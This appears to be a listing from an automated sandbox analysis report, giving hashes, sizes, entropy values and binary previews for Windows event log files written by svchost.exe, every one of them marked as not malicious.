SSDEEP:	384:NkGf/hDGCyCkCzCRCFCxCiCuCLCBCF9CAC1CZ2go2K2EK2i2O2sr2JCNCuCFtCST:NkGf/drOd1eyZ3OwSBStl
MD5:	66927421ECE4307DCB1A53295722997D
SHA1:	B8A51477D0FC37B4CB246AB8600553E4CE6D13F2
SHA-256:	D39114FA0E5E223F8E4FD3FBADD79B7BC5EC5475F0B1A69C51FA58B23B486278
SHA-512:	E3D9A936F24D86D0FFBFBCF0E8F0DAE87209AD8D7D23F2889A824AE87F10B44EF29C80062FF2042A3F93CE5F40F2DD1383D147FA16FBC9AD9604E1BCFF2B5D94
Malicious:	false
Preview:	ElfChnk.U...............U...................x.........?.....................................................................a...................F.......................n...=...........................................................................................................................f...............?...........................m...................M...F............................4..............................&........................q......................Yd...............^......................**..0...U.........Df..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4AppDefaults.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.455832540784598
Encrypted:	false
SSDEEP:	1536:oAmCWdBxpHKiGVm4DPBPpPl4vy/vINPqRy3xJ0YOtSIg06H5DQDOSRgpHRCQ8ofu:oAmCWdBxpHKiGVm4DPBPpPl4vy/vINPi
MD5:	0C10329DAFA9D19DF3495634F040FB6A
SHA1:	B9775262572B6D0E4D10173F363CE0FFB1DBB4D6
SHA-256:	E2CA2F4586AC7F7DEC19543F896DDAFC6EEEA42517CF52557311D072D7DE9071
SHA-512:	1BDABA417BE73B291F5126B61A1FF0434476F3282FE1CF1E677079443DB8C947F9605713585553195CEBC295392A3A55D24ED8168EF51E71EC13A4455C02001A
Malicious:	false
Preview:	ElfChnk......................................e..xg...j;......................................................................te.................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........................R..............................................................**................U6q.............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-Core%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.4812984418444985
Encrypted:	false
SSDEEP:	1536:YRcxzFFB8Qg4nS7wOetMPGeIgi4+J1c9cc+1B9xUf865kVwH4jUT8LFPSTGpCAPo:YRcxzFFB8Qg4nS7wOetM+eIgi4+J1c9F
MD5:	DFFB81A5282B64869B41CA4CF9C81217
SHA1:	A7E7167101D41893E0C64D99BA39AC7DD9DB5425
SHA-256:	4DA1C3918FAD1F8594EC609C74B8140D0D06C0021E62B52BB0F99C28FCDEB31C
SHA-512:	7BCA5C59007C32BB872A7F2FC8AE4A912514AA52C60A9BE0D9D8E46FD1447DF3C6224D54608E9D8350EA8A77057F61B6D2FCD3B056F52471FED4ACF83B119E7B
Malicious:	false
Preview:	ElfChnk........................................H..............................................................................\........................................V...=...........................................................................................................................f...............?...........................m...................M...F...................................................................................&...................ir..............9p...k..............qt......**..............b4..v.........1...&.......1.....#\......Z.........A..z...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-ShellCommon-StartLayoutPopulation%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.525904809609912
Encrypted:	false
SSDEEP:	384:RfhQ7F7b7+I7je737AY7fG7EW7f7y7Z7r7c76777z7M7y7z797M7z757E7p7z7Rz:x9uAMM2hs
MD5:	E020B14C787AA3075A14C6716D2491AD
SHA1:	33910F10CD0772EA5BCE376FD3642070D23AE91A
SHA-256:	3B64461A64296366D509580BEEB10745E4AD18A494817B0467166FBE9B2EC3F0
SHA-512:	2FB2B97788B75EC7B52CB49AEB606403FEB549BF156A8DA1CE9D4F1A5399F7EC8368A55EC354000964F2E6AEAE568705A36049E203E40531FA720E71D9289D5A
Malicious:	false
Preview:	ElfChnk......................................e...g...\.......................................................................I..............................................=...........................................................................................................................f...............?...........................m...................M...F...........................................#..s...........&........................C.......................................(......................*..............>.;.q.............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Connectivity.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	2.3387125657910106
Encrypted:	false
SSDEEP:	384:Thc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauinX:T6Ovc0S5UyEeDgLFOQClhty
MD5:	B1ADDD16B72A614A30B256BCFDB99AC8
SHA1:	81084E39A35B6B891B623EC03DB30F11093D831D
SHA-256:	A37E58A921282D11D70A963C34C8CA8B61EE9E16EB90A6499FBEBD332EDFE386
SHA-512:	B4A9A2B4980666CA5BCDCCC38694C6B25C83A62A97FC0513ACDE11416F7A5215D3698DCD6C5157051787B2E5266547E4232B8CF61E2752909A7B8B856BEAFD0A
Malicious:	false
Preview:	ElfChnk.........@...............@...........`v..@x....D........................................................................................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...................wb......&........................................................e..............................w...............................*...............&3..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Security.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.78398437074799
Encrypted:	false
SSDEEP:	384:mIhGuZumutu4uEu5uOuDuyb2uPu1uQu1auwuFu:mI+
MD5:	2A99B668C43BBB4B0B6A0287A57EB586
SHA1:	47CDE1E4E8A8F4EFB0F51127B65A470EBE5846C6
SHA-256:	70C46DCB68BDAAADE324AC6F7895DE2398DD8C3D5A4342DAABE9E5BAFC0FE4A5
SHA-512:	5434DDEF724A83BD74F94723306046B9FD1B572E41B640B98EFAA7059D70163CFAF85763B05C6D168F0457E48E044B2CE97F43B92ACD25C99FF89F9DAD60899D
Malicious:	false
Preview:	ElfChnk.....................................H!...".............................................................................................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......................>...............................................................**..............Wy.8..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-StateRepository%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.2398054630975714
Encrypted:	false
SSDEEP:	384:58hVApALAnypA2A4+nAYaAYKAYiARAY2AtAYGAqJ8AAArIPbA7AtAeAvAqfAsA2T:SUyppJh6XfE7mR8aihhx5a2pT
MD5:	19652704902B46A3AE9936FD499B097C
SHA1:	779830BECFC982908B990E781B9807E342DC4A4A
SHA-256:	99217D71173008010489C6D5D5A650773706835744BAE82B8FE3A7747EFC3DD8
SHA-512:	B8018EE6F8C1BA0F952FF5AA069BEAD7F0421D9E81D1570C5CD8A418B22625135E97F311B43C8528BBA08CD6C3B04184551FCEABC9A542C32194160361DAAE26
Malicious:	false
Preview:	ElfChnk.....................................Xk...l..Q........................................................................G..................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................E$..............m"......................................&...............................................................**................C.u.........1...&.......1.....#\......Z.........A..z...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Health.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	DIY-Thermocam raw data (Lepton 3.x), scale 8448-769, spot sensor temperature 0.000000, unit celsius, color scheme 1, calibration: offset 0.000000, slope 96772112897977767655460831232.000000
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.770151261804737
Encrypted:	false
SSDEEP:	384:bhdpj0qpR0npRbHpRiTpR5XpR4fpR/npRWrpRtHpR8pFpRj3pRqLpRBfpRA1f1px:bevfbJh
MD5:	59B2683471F07FFB59E483A8DA9539DC
SHA1:	24A71D79F9EE283DA6DE91D5DE303B81A5FFDF61
SHA-256:	1811EE0C8B74D570153511E1FED3013510C93EE0038FFEB0F6EF4DCC4137FE17
SHA-512:	0F9F4D5C2B345F2C4FAA3CC958E46B98A883528731E3137852462ACC2809A9E5F4727EBE69BA70AFC23C3EA8CAFE939B6B390A8CA9E64E3689B780A1010C33A9
Malicious:	false
Preview:	ElfChnk......................................e..Hi...t.........................................................................v........................................8...=...........................................................................................................................f...............?...........................m...................M...F...................................................................................&...............................................................**.............._h..v.........1...&.......1.....#\......Z.........A..z...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.8291249377738152
Encrypted:	false
SSDEEP:	384:mhtbpwV1pIvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWBS:mwDoh1VoaHDuxTjf1a
MD5:	0184F70509EC0A792E050CD9CF508DFB
SHA1:	421FE0CB583647B818101AD7A2635EB586F192B1
SHA-256:	94283857B30C0889293FD6109A9BAB6623FAD76728BEC8D447515A80FC34BC3A
SHA-512:	A5C143B8D8936B79FFD3AE8D78EF7A0597943D7B12D49D8851DFA9438BADBCAD8E770DF3B1DC39F1D8B531885EBE64CF32965C48314B05EF74F673DBC1B4B9D6
Malicious:	false
Preview:	ElfChnk.\...............\...........................^W{........................................................................C.......................................R...=...........................................................................................................................f...............?...........................m...................M...F............................................;..............&...................................i...................................mS..............*..8...\........=..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.124694262171386
Encrypted:	false
SSDEEP:	384:DhwCCRzCaCkClCzCYC/CyCVCGCMCvCwCWwCvClCviC:DKFeH
MD5:	2BF10029572EE57CDF4699604763C4C9
SHA1:	A7BDF922E5098ADF3BA763FDA5129C410BCADE55
SHA-256:	2BC8BC7C1BE725086D3E162BD40846C448427BAB6884731EB392D60B053D6546
SHA-512:	7D81E63F20444C41D9F8282C48A2187646BADECEE8BC3B84F379CCE5B0BAE29A638C9AC35A29BDEE98B754A1919D4FE9B42A3022B4B9EEDA751A061098A241EC
Malicious:	false
Preview:	ElfChnk......................................1..(4..........................................................................x..................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................................v)........................................................../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Store%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	4536
Entropy (8bit):	4.401029160293183
Encrypted:	false
SSDEEP:	96:5qCRChBVROaJCRCiWDwEd4CRCh9DENPCRChWuKUOCRCh4INCRChJERgCRCh1mUyL:5qMSLsaJMTk4MS9+PMSWuKUOMSxNMSMX
MD5:	F5BDE80869567ECF602833D9609B76DC
SHA1:	B63221E90BEA64FB85BEF6855D3ABE9AB5E2E087
SHA-256:	A52F02C7EDAF47444CD565E3155947EC6A16E145B7387A5E9411E866995A8362
SHA-512:	E1869002FE09CDBA7E0156C175EA14685F82EF9B3ECC930D220A631E1996F9641D5582CF1F99FD82C2C3E5BBA38E0DC443F44E8C5282BE48FD90F1BFA863D3FE
Malicious:	false
Preview:	ElfChnk..%......-&.......%......-&.................K.......................................................................E.n................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F.......................+2..................................mF......................&............C..................S...............................*......'&.......F..U.........1...&.......................................................................F.....!...A.A............F..U....Y..v....M..v.......T...'&...................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.t.o.r.e..7...\..C.....M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.t.o.r.e./.O.p.e.r.a.t.i.o.n.a.l.......C..............I.......I.n.v.o.k.i.n.g. .l.i.c.e.n.s.e. .m.a.n.a.g.e.r. .b.e.c.a.u.s.e. .l.i.c.e.n.s.e./.l.e.a.s.e. .p.o.l.l.i.n.g. .t.i.m.e. .u.p.:. .P.F.N. .M.i.c.r

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storsvc%4Diagnostic.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 15, DIRTY
Category:	dropped
Size (bytes):	79016
Entropy (8bit):	1.8204182868231482
Encrypted:	false
SSDEEP:	384:y0hL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUmeUmtcUmbUmCVUbhL6UsE0Z4:XY7L/fKY7L/f
MD5:	C4C1EC3125BCDDC7D2A2F01B63488C1D
SHA1:	D4BF96139077818D811915E3FFEA18C5A901E631
SHA-256:	0C1082DFC626B253F75E484A883E885D2842E2FD6D5A55D5AF4B2886F2625C79
SHA-512:	8000979DA796CC438A28E492FADABB786C16164EE74C699E0F4BAA69D38B29302B8C80A8EBBF1D7B9AEC9ACADAA7DC61B538D82E780C95D4976C7C487D5DA33B
Malicious:	false
Preview:	ElfFile.....................................................................................................................\>.eElfChnk......................................1..(4..w.=V.......................................................................@................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................&......................................................................................................................*..............a...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

C:\Windows\System32\winevt\Logs\Microsoft-Windows-TZUtil%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.20353861482968547
Encrypted:	false
SSDEEP:	48:Mi2WmgrP+wQNRBEZWTENO4b3BNAo2/6q:OdNVaO8vAo2/6q
MD5:	4FF5CE44986BD68FBDDC3248D060F06E
SHA1:	746481905F713C836801C399E4FDA2FF55A1FD59
SHA-256:	D8CBDAE3CEFB4C056DB5DAAA2651CB400501B81B222945A97914ABD0DD511FAC
SHA-512:	751C07B0303E85A33051ACBD63A7B2644A22520D0216B38DF8E402768D7BD39743F569171DE719926D9036C7A3125F6669303852C95DB6E7C4997F9518C19F8E
Malicious:	false
Preview:	ElfChnk...............................................pe.....................................................................v].........................................F...=...........................................................................................................................f...............?...........................m...................M...F...................................................................................&...............................................................**................9"w.........1...&.......1.....#\......Z.........A..z...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.081157197385181
Encrypted:	false
SSDEEP:	384:bzhMivNiGipikiHiDizfiaihinFiuiN9ioiKEi/iUEHijVimiHiqiziViHi1iTiM:PnX21ECJYM9QSp
MD5:	C0EF4339CEA12A83B32D475A050F9752
SHA1:	8413F8E4C30CCBA9C823DD8FC6BDAE2F98C65BA8
SHA-256:	CFE4BAA10C2FAFF48052E0B19278229269A69D36ECF4F8D8D973242C5B3F5F0F
SHA-512:	D7BCDFECEC6B0EF8E4AE2EA78F60F315419CB4A64AAD1B82D418FBB844327B5694F3510412F954E1C3405B2EFC45689248C3FDC2ED272E276BAAAD599BA5D399
Malicious:	false
Preview:	ElfChnk.y...............y...................XY..`[....N:....................................................................w..-.................!..a.......................=.......................#...................................................................................................f...............?................'......P.......................M...F........................................................................#..........^0......................................o!.......'..............**......y........yOGo...........g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.401697644493467
Encrypted:	false
SSDEEP:	768:P3YaIPNaXazaEMXa7a7aDanafaTaXaraLaraPavarajaLaza/aTavaDavajava3b:mP
MD5:	060B1C507B36FE6EFEB8D3DF07005146
SHA1:	2BCAB32CB66158C6D80C3EAD559239564630C026
SHA-256:	799440B5165B7C6D4883A88618168D44EF24A76F463E92DFFD5131DDA7167105
SHA-512:	3CB9F82F66276D225664B1E0A65EC2FC8202A01DE472E1CDC69FA88C27FE3A49BDCCD2F3E76F8A282F6E7DFB0954B3B0BB03ECF21096E8D2B560F7E41AFBCE2F
Malicious:	false
Preview:	ElfChnk.........@...............@...............`.....U.....................................................................\|#.................^...........................=...........................................................................................................................f...............?...........................m...................M...F...................................................................................&...........................7...................................**..H............E..w.........1...&.......1.....#\......Z.........A..z...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Device Registration%4Admin.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.314101482518314
Encrypted:	false
SSDEEP:	384:2haXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJzXJ+XJsgXJdXJnXJJXJ:2Q0yUkNYwD8imLEVysoD5/
MD5:	189A5A86B1DC643E3DC065A93AF612A1
SHA1:	85808058CFB4E8ABF7A381E4F5DE112FCEB291D4
SHA-256:	4D9E79CAF50933FB2AE39BFCD393478FDD9374259EA9285196C7DB44C9C1E391
SHA-512:	A2F2C9F6C69E599628750F208DDC665A06707B129FD24B07956E7405517C158E1495329F47653B511580A230C4DE7F2EA121933DFB480421A9CAEB65CCA66D92
Malicious:	false
Preview:	ElfChnk......................................>...A..>'.......................................................................f^S................j...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........................3..................................C...........................**..............@V.$..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Profile Service%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.336641567676869
Encrypted:	false
SSDEEP:	384:vhnmumNm1amCmvm/mHhmHm0mom5memtmsmimGmHmEmqmwmHmLmlm9mGmdmpm3mfi:v9TADcx2M
MD5:	DC75193BF325BC736926A52B23217883
SHA1:	D363ECEE473331E76772FD59D6FB44CE588316B6
SHA-256:	0633931ECA70783BD7EECCA2001B58203598EB57AEAF301B0C8420B8A2B20EBC
SHA-512:	3F16F3203AC9B2E6557945F8D7A0980C72A4A2A30EEC766448AB19966E6DCEAB9BA9C488E487229EEEE638E120943550B06018B663722856E8BC9F7CF0687736
Malicious:	false
Preview:	ElfChnk.............................................?......................................................................C...................H.......................p...=...........................................................................................................................f...............?...........................m...................M...F...............................................k...................................&.......!.......................................................**..h..............Gv.........1...&.......1.....#\......Z.........A..z...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.345096968074752
Encrypted:	false
SSDEEP:	384:8hu2jk924P2n2j2f12o2N2sS2D2d2l2R2N2F2t2u2e2+262a2G2e2O2n2r2X272V:8hR2bbp
MD5:	6DF92F70861D6234E2CFC21C0CDA4035
SHA1:	39EA1671559EACE4A7EB4EFE5340087F5200C968
SHA-256:	E16CD070708D9E3718FF3CE035F02E2EAF2F182ED4FA20AD477E34021B8FA6A1
SHA-512:	35569620E8BE6E9B5E6B6D4A9F6D45E9D080663DE2139B086382DD3C6D1300767AB963A9B981E15C0C7E9615522081823EEE347DD8ADE72E08DE3663DBBF8415
Malicious:	false
Preview:	ElfChnk..............................................sB......................................................................u0l................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...............................#...................................................&...............................................................**................,.v.........1...&.......1.....#\......Z.........A..z...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-WER-PayloadHealth%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 10, DIRTY
Category:	dropped
Size (bytes):	74496
Entropy (8bit):	1.7515260585175436
Encrypted:	false
SSDEEP:	1536:bupP9JcY6+g4+Ga6SEupP9JcY6+g4+Ga6S:bupP9JcY6+g4+Ga6JupP9JcY6+g4+Ga6
MD5:	98052848E5ADF2E6F9BA13F3A273F864
SHA1:	CC11AD6F6F5340961F7B0F25561E5F78D20060F5
SHA-256:	0CA1CF632AD320392E0CBC8C38CDC5262E2CFDA08D9765557668867902FBA168
SHA-512:	483CF0C973D9DF5863DEDD786DF99F592CF461F8516AA5341E7758D14E9A47A076C1257D6B58251FCB98305C3C195E8ECB5F4AB693C6DB6351B111DAB6190713
Malicious:	false
Preview:	ElfFile.......................................................................................................................zpElfChnk.....................................H...."...FH......................................................................o.6................Z...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......................n...............................3...............................**................................&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

C:\Windows\System32\winevt\Logs\Microsoft-Windows-WMI-Activity%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	129192
Entropy (8bit):	4.3441152977520225
Encrypted:	false
